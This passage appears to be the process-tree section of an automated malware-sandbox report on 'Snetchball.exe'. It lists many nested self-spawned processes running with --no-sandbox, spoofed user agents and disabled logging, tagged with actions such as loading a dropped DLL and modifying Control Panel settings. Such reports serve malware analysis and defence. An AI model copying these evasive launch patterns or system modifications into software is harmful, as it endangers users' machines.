        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=2824,i,16189599843968753531,18440944468441774444,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        7⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2824,i,16189599843968753531,18440944468441774444,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        7⤵
        Loads dropped DLL
        
        PID:4792
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        Modifies Control Panel
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        Modifies Control Panel
        
        PID:6340
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:2760
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7252
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:5216
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:1300
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:228
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:1816
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        Modifies Control Panel
        
        PID:3380
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        Modifies Control Panel
        
        PID:2612
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7520
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        11⤵
        
        PID:7928
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6816
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:5396
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7432
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        Modifies Control Panel
        
        PID:6976
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:7140
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:7136
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6968
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6196
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:2260
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6804
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7292
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        Modifies Control Panel
        
        PID:6724
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:4108
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6504
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        Modifies Control Panel
        
        PID:2312
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6768
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:6572
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:3044
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        Modifies Control Panel
        
        PID:5868
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2904 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        11⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3156 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        11⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3640 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        11⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3652 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        11⤵
        
        PID:7592
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        Modifies Control Panel
        
        PID:6940
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:2052
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2816,i,14632695549275859985,15428255831218273043,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        14⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2960 --field-trial-handle=2816,i,14632695549275859985,15428255831218273043,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        14⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3184 --field-trial-handle=2816,i,14632695549275859985,15428255831218273043,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        14⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3204 --field-trial-handle=2816,i,14632695549275859985,15428255831218273043,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        14⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2816,i,14632695549275859985,15428255831218273043,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        14⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        15⤵
        Modifies Control Panel
        
        PID:7084
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        Modifies Control Panel
        
        PID:7272
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:7248
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        18⤵
        
        PID:7664
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        18⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:5720
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        18⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:7320
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        Modifies Control Panel
        
        PID:6420
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:4188
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        18⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        18⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:7708
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:5952
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6592
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:7680
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        16⤵
        Modifies Control Panel
        
        PID:1228
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Modifies Control Panel
        
        PID:7004
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:6940
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        Drops file in Windows directory
        
        PID:7328
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2892 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        18⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        18⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
